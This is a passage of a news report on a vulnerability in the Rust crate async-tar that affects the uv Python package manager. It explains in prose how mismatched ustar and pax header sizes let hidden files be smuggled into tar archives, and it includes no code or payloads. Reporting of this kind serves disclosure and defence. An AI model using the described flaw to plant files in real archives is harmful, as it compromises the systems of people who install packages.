A vulnerability in the popular Rust crate async-tar has affected the fast uv Python package manager, which uses a forked version that's now patched – but the most widely downloaded version remains unfixed.

The vulnerability is an error in the header parsing code that allows an attacker to hide additional files in a tar archive, discovered by a team at secure computing company Edera.

The tar format can support both ustar (Unix Standard TAR) and pax headers, the latter was added as an extension to tar decades ago. When a file entry has both ustar and pax headers, the code advances the stream position based on the ustar size, often zero, rather than the pax size, which should override it. This means it may interpret file content as a tar header, enabling smuggled files. Edera stated that th

See Full Page